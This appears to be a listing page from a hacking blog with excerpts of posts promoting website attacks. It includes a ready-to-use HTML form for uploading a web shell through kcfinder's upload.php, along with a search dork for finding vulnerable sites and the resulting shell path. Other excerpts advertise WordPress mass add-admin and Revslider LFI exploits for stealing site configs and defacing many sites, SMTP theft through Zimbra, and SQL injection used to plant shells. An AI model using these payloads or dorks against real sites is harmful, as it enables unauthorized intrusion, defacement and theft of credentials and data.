Tech-Technical | Security Experts

kcfinder exploit upload shell

  Hi Guys today i want post a new exploit descovered today by INCEF-Team  is An exploit for upload shell in kcfinder code of exploit : <form method=”POST” action=”site/path/kcfinder/upload.php” enctype=”multipart/form-data”> <input type=”file” name=”Filedata” /><button>~/ ndsxf</button> </form> if site infected will show u : “Unknown error” shell format is : shell.php.ndsxf Dork : inurl:/kcfinder/upload.php and shell dir is  : site/path/upload/files/shell.php.ndsxf  

How to hack SMTP for A to Z

  Hi Guys about lots of message in my account fb most of friends asking about how can get SMTP, well in this topic and video i will expaln and show u one of good methode to get SMTP is with an exploit on Zimbra and all know who is Zimbra is like Godaddy in host and domain, RUBY INSTALLER !!!!!!!!! Exploit link!!!!!!!!!

Basics To Pro Using SQLi

Basic of sql injection tutorial Hello to all 😀 i am nob here  i will show you how to hack any websites using sql injection Learn simple sql injection step by step 😛 What is SQL Injection? SQL injection is one of the popular web application hacking method.  Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from …

WordPress ZeroDay(0day) Add Admin mass exploiting

Hello All I hope all fine   mass exploiting for exploit add admin in wordpress this exploit exist on  27 themes exploit discovered by NULL_Pointer  link : here how to use this script : php script.php list.txt theme list.txt : is list of ur sites theme : is theme on sites and write ur email like picture : go to http://www.site.com/wp-login.php?action=register, you will see the registration form choose your …

wordpress 0day exploit Revslider

Revslider scanner ::For this exploit :: dork :  revslider.php “index of” site:**            inurl:/revslider/rs-plugin/videojs/video-js.swf            inurl:/revslider/rs-plugin/videojs/ you can deface so many websites using this exploit Among the best exploits on wordpress now is wordpress revslider LFI this exploit allow us to dowload config of site that u can connect database and change the admin user and pass …

Finding vulnerabilities in PHP scripts FULL ( with examples )

SOURCE <<–|::| Offensive Security |::|–>> Name : Finding vulnerabilities in PHP scripts FULL ( with examples ) Contents : 1) About 2) Some stuff 3) Remote File Inclusion 3.0 – Basic example 3.1 – Simple example 3.2 – How to fix 4) Local File Inclusion 4.0 – Basic example 4.1 – Simple example 4.2 – How to fix 5) Local File Disclosure/Download 5.0 – Basic example …

Xpath Path Injection Using UpdateXML (SQLi)

Xpath Path Injection Using UpdateXML Similar to SQL Injection, XPath Injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to. He may even be able to …

Uploading Shell Using SQL Injection

Uploading Shell Using SQL Injection SQLi is a fun thing I thought, cause we can do something cool, like we can make some pop up alert, or using HTML code, and we can make phising concept inside SQL Injection. Thats awesome right? For this time I wanna share about “Uploading Shell Using SQL Injection”, all you need is:   Your must have write privileges and …